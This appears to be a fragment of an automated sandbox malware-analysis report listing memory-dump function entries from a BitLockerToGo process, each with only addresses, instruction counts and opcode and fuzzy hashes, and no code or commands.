                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 341ef750ec03c028e0e6506e823484441a3ec9ef90c48452d7ca6a3fe934f4d4
                                                                                                                                                                                                                                      • Instruction ID: b76787590db881684f3a10faa44155b548041f6ac149ba9a52ce8a5872f79bd8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 341ef750ec03c028e0e6506e823484441a3ec9ef90c48452d7ca6a3fe934f4d4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D031F04800E2E049CB17877500A45A1BFE25DAF00D36ED5DED4D80E3A7D19BC65BDB36
                                                                                                                                                                                                                                      Function 004B0C01 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2df45a89baf320c20682460eca533872651f62c78a1fa3be570b94a46124fa0e
                                                                                                                                                                                                                                      • Instruction ID: 82e0eef51fb573dfc82f3d20919f67e66d7fe777c982312420b0d4c3728407db
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2df45a89baf320c20682460eca533872651f62c78a1fa3be570b94a46124fa0e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF31134800E2E049CB17873500A45A2BFE25CAF01D36ED5DED4D84E3A7D19BC65FDB26
                                                                                                                                                                                                                                      Function 004B0CD1 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: fc46c2d8f62b0b8c3d40e32b29826b26909e5a6e4b42d2646a67778a5618f164
                                                                                                                                                                                                                                      • Instruction ID: 2f75f9a0b38bced9e7c0f111fc2b173596e83ac589c12b9eb50d42e7d102ab7c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc46c2d8f62b0b8c3d40e32b29826b26909e5a6e4b42d2646a67778a5618f164
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3831044800E2E049CB17473500A45A2BFE25DAF00D36ED6DED4D84E7A7D19BC65BDB26
                                                                                                                                                                                                                                      Function 004AFDD1 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: a67df5e56eeef3168a1d78a0a9fe0095bbd3de1b54a9374141e1c2080c412d41
                                                                                                                                                                                                                                      • Instruction ID: 5e59fd5b9838444f47f6891b90c81c460c766932b8aa8e17e3c74368ce5f9c2c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a67df5e56eeef3168a1d78a0a9fe0095bbd3de1b54a9374141e1c2080c412d41
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D831ED4800E2E049CB1B877500A45A2BFE25CAF00D36ED5DED4D80E7A7D15BC64BDB36
                                                                                                                                                                                                                                      Function 0049AF61 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 5d3cf7cce40d1f717d59cf38f833a3138a277bf7bf5f7c40cfd82b1456941e0d
                                                                                                                                                                                                                                      • Instruction ID: 73911347d4a75bba32134c6537c2ca1a28b5c5e9c9b66dd437edcfc948f159a2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d3cf7cce40d1f717d59cf38f833a3138a277bf7bf5f7c40cfd82b1456941e0d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4231ED4800E2E049CB1B8B3500A45A2BFE25CAF00D36ED5DED4D80E7A7D19BC64BDB36
                                                                                                                                                                                                                                      Function 004B0261 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f3d0ab84cea95657e9594b05b07d4afed47309b6b1f4609c9a66cec08bdc57f0
                                                                                                                                                                                                                                      • Instruction ID: 54bb77722f04c9ac692c932e32577731b02b4a8848f9e33fbe749eea840156c1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f3d0ab84cea95657e9594b05b07d4afed47309b6b1f4609c9a66cec08bdc57f0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C431134800D2E089C717873540A45A2BFE25DAF00D76ED5CEE4DC0E3A7D26BC65BEB26
                                                                                                                                                                                                                                      Function 0049B8B1 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 3e3ee18c0812546bd73eef3540a0365ecf4f657698b23050275fec7f8097957b
                                                                                                                                                                                                                                      • Instruction ID: 3eb154afa7d4abe5dd53d0adf1820daaf1e01679f909c88574b99a628e868e44
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e3ee18c0812546bd73eef3540a0365ecf4f657698b23050275fec7f8097957b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2631135800D2E089CB17873540E45A2BFE25DAF00D76ED5CEE4D80E3A7D19BC65BEB26
                                                                                                                                                                                                                                      Function 004A39F1 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: df42b43bf933fe08e00a9a49856053814d6acb08443b0190c38be99f36842654
                                                                                                                                                                                                                                      • Instruction ID: 997633e4d624c41d0074e4d36a37f02100859f7dd4c822a47bc2cde341fdb4f4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: df42b43bf933fe08e00a9a49856053814d6acb08443b0190c38be99f36842654
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C631FD4800D2E049CB1B4B3540A45A2BFE25DAF00D76ED5CEE4D81E3A7C19BC65BEB36
                                                                                                                                                                                                                                      Function 0049AB71 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 0e59afabbbae58f44f674841f1b757f93c776f04f10bfc0b23b1d8b59a5bc57b
                                                                                                                                                                                                                                      • Instruction ID: 90f4244d7a81fce09ae1031402e3c17c07eb94624c90bb44493989ff3e70c54c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e59afabbbae58f44f674841f1b757f93c776f04f10bfc0b23b1d8b59a5bc57b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B031144800D2E049C717473540A45A2BFE29DAF00D76ED5CED4DC0E3A7D29BC65BEB26
                                                                                                                                                                                                                                      Function 0049AE31 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2452c3289606961eb97c1de26b57f843700e804c801793451e4db397de9177b3
                                                                                                                                                                                                                                      • Instruction ID: c07a1311d71174afbe1f364ac815324ea0ac524a6025a25b62de4ba7e19db166
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2452c3289606961eb97c1de26b57f843700e804c801793451e4db397de9177b3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8310F4800D2E049CB17873540A45A2BFE29DAF00D76ED5CED4D80E3A7D19BC69BEB36
                                                                                                                                                                                                                                      Function 0049A051 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2a2eb64d7150c47deb5bfc8a9c4204b0a20ad3b4eb1bac1f797a843bd0d07365
                                                                                                                                                                                                                                      • Instruction ID: 908fd583df464e3a9fcd608c97acb69a9aa73fce6abc53a46ad2b727b33c8cfa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a2eb64d7150c47deb5bfc8a9c4204b0a20ad3b4eb1bac1f797a843bd0d07365
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC31244800D2E049CB17473540A45A2BFE25DAF00D76ED1CED4D80E3A7C15BC69BEB36
                                                                                                                                                                                                                                      Function 004AF0B1 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 59744ca8e98632f394ac56f823ecce93100623ad926987c367bc0098dbf6565b
                                                                                                                                                                                                                                      • Instruction ID: 329f2e76ad25eb66dcc9431796d503d76408d506be1ec185f2ba01a0c1c2c616
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 59744ca8e98632f394ac56f823ecce93100623ad926987c367bc0098dbf6565b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7131EE5800D2E049CB1B4B3540A55A2BFE25DAB00D77ED4DED4D80E3A7D16BC68BEB36
                                                                                                                                                                                                                                      Function 0049E1F1 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: fcaa70afa5b6dcfe4d47c7700f9018e0ba111607145ba0be5eb1adfdabfc1f8b
                                                                                                                                                                                                                                      • Instruction ID: 8c4084af00bb7e9fa78c746b15e833f472fbbc6b0b24a14a804209fcdbfb2091
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fcaa70afa5b6dcfe4d47c7700f9018e0ba111607145ba0be5eb1adfdabfc1f8b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC31235800D2E089C717873540A45A2BFE29DAF00D76ED1CED4DC0E3A7D1ABC59BEB26
                                                                                                                                                                                                                                      Function 004B2411 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c5bdb1da398f1ba905237a4b5d8c8d6ecd37628c02f69352ad9c07387c343d7c
                                                                                                                                                                                                                                      • Instruction ID: 1986bf3aeea9e4359efe99f040acdb6fad0b5565ccbcf076ebb163cb9d22ef42
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5bdb1da398f1ba905237a4b5d8c8d6ecd37628c02f69352ad9c07387c343d7c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D31135800D2E089CB17473540A45A2BFE25DAF10D76ED1CED4D80E3A7C16BC59BDB36
                                                                                                                                                                                                                                      Function 004994F1 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 158dbfc5d027f8ad65f414493a77e773c5745013022e2eb628a621a82fd2436a
                                                                                                                                                                                                                                      • Instruction ID: aa8a613de581d7d1914759d40390d11a4a28de2303bc4ede3870be478d062bbf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 158dbfc5d027f8ad65f414493a77e773c5745013022e2eb628a621a82fd2436a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1131135800D2E048C717873540A45A2BFE25DAF10D76ED1CEE4DC0E3A7D15BC55BEB26
                                                                                                                                                                                                                                      Function 004B1501 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 7f5455f84088d1b71f594da24e4eb9dc4b83656cd858c7ec5c61ccf6279fceb0
                                                                                                                                                                                                                                      • Instruction ID: aa73233216e9c88af6b0fd6567eef48fc102f67b07b8960c4ebe5209a6f6f152
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f5455f84088d1b71f594da24e4eb9dc4b83656cd858c7ec5c61ccf6279fceb0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8031104800D2E058CB17873540A45A2BFE29DAF10D76ED1CED4D80E3A7C16BC69BEB36
                                                                                                                                                                                                                                      Function 004986F1 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 53e573e8f797b0810c699c692d7a0ebe6017b44fae4116ff190281038831fc23
                                                                                                                                                                                                                                      • Instruction ID: fcd86633ca71dd3928a0b5b6de512ccefe9791815191b802ec73a066b9f36007
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 53e573e8f797b0810c699c692d7a0ebe6017b44fae4116ff190281038831fc23
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2310F5800D2E048CB17873540A45A2BFE29DAF00D76ED1CED4D80E3A7C15BC59BEB36
                                                                                                                                                                                                                                      Function 004A3831 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9e7c4707ee210f213d340357a5eebd00c0351b79fa2f204d1dcce453b9b7bd2b
                                                                                                                                                                                                                                      • Instruction ID: 6c87967ce581912cbd37f413a701a130ed8e211d310046e8cc7d032966e64b49
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e7c4707ee210f213d340357a5eebd00c0351b79fa2f204d1dcce453b9b7bd2b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F31EE8800D2E049CB178B3540A45A2BFE25DAB00977ED1DED4D81E3A7D15BC68BEB36
                                                                                                                                                                                                                                      Function 00483901 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: b0bb785d73da30919a0e7b4fc9244a52894ff885db81f8f0d3c1f870418d28a9
                                                                                                                                                                                                                                      • Instruction ID: 99ef0635f4bed1270906e41b99bc4f4d5ee090a84306f63775f5adcbf56f1924
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0bb785d73da30919a0e7b4fc9244a52894ff885db81f8f0d3c1f870418d28a9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A31255800D2E098C717473540A45A2BFE25DAF00D76ED1CED4DC0E3A7D15BC55BDB26
                                                                                                                                                                                                                                      Function 004AF981 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 33bc906698fddcb030e9028ca54826ce2e88284a4d77a23b24076fe65f443c7b
                                                                                                                                                                                                                                      • Instruction ID: e28f961cf3a0830cb8d295ada3eb7bcd0f6d7e35085abeca9387f34cbc371a36
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33bc906698fddcb030e9028ca54826ce2e88284a4d77a23b24076fe65f443c7b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8131255800D2E048CB17473540A45A2BFE25DAF10D76ED1CED4D81E3A7C15BC69BEB36
                                                                                                                                                                                                                                      Function 00483BC1 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 66d5d91293ce60f5e5d86c53cc6bbe219ed1367d0d3cb682bf19898b766a6006
                                                                                                                                                                                                                                      • Instruction ID: 53f4c69d711e01940ed4619f99b4a6512f91b6fb2137f41d14bb87a182c676b5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66d5d91293ce60f5e5d86c53cc6bbe219ed1367d0d3cb682bf19898b766a6006
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7310E4800D2E058CB17873540A45A2BFE25DAF00D76ED1CED4D80E3A7C19BC69BEB36
                                                                                                                                                                                                                                      Function 0049BCB1 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 274de8c57693af61252517dcad0846fc401f798c09059787b60bcf1dfd79d76a
                                                                                                                                                                                                                                      • Instruction ID: e4dfe2ed7f61a6f1327545eb8042ab1934e2129b91f7a3125f4cdbb120d07c96
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 274de8c57693af61252517dcad0846fc401f798c09059787b60bcf1dfd79d76a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85311E4800D2E049CB17873540A45A2BFE29DAF00D76ED1DED4D80E3A7D1ABC59BEB36
                                                                                                                                                                                                                                      Function 004AFCB1 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 98288d0164eb2b9a4c81a93d1e067d29158e5faf148effe901416ec5e2c5d89e
                                                                                                                                                                                                                                      • Instruction ID: 028f50ef9c5f27b36257fdf90c283d7fe949ca76847d40ecd790c82862e98dc5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 98288d0164eb2b9a4c81a93d1e067d29158e5faf148effe901416ec5e2c5d89e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B231255800D2E048CB17473540A45A2BFE25DAF00D76ED1CEE4DC1E3A7D15BC65BDB26
                                                                                                                                                                                                                                      Function 004ADFF1 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 5c6c945e84981bbb0a0ad38afdab1f699d2984b20e2b99853c87d6832bde1c04
                                                                                                                                                                                                                                      • Instruction ID: 6164f8ce9e43729787f42a96bf1c33431951ff68448e027baa3dddae142f3d5c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c6c945e84981bbb0a0ad38afdab1f699d2984b20e2b99853c87d6832bde1c04
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3831255800D2E048C713873540A45A2BFE25DAF00D76ED1CED4DC1E3A7D25BC65BDB26
                                                                                                                                                                                                                                      Function 004A41C1 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2391247874.0000000000480000.00000040.00000400.00020000.00000000.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_480000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
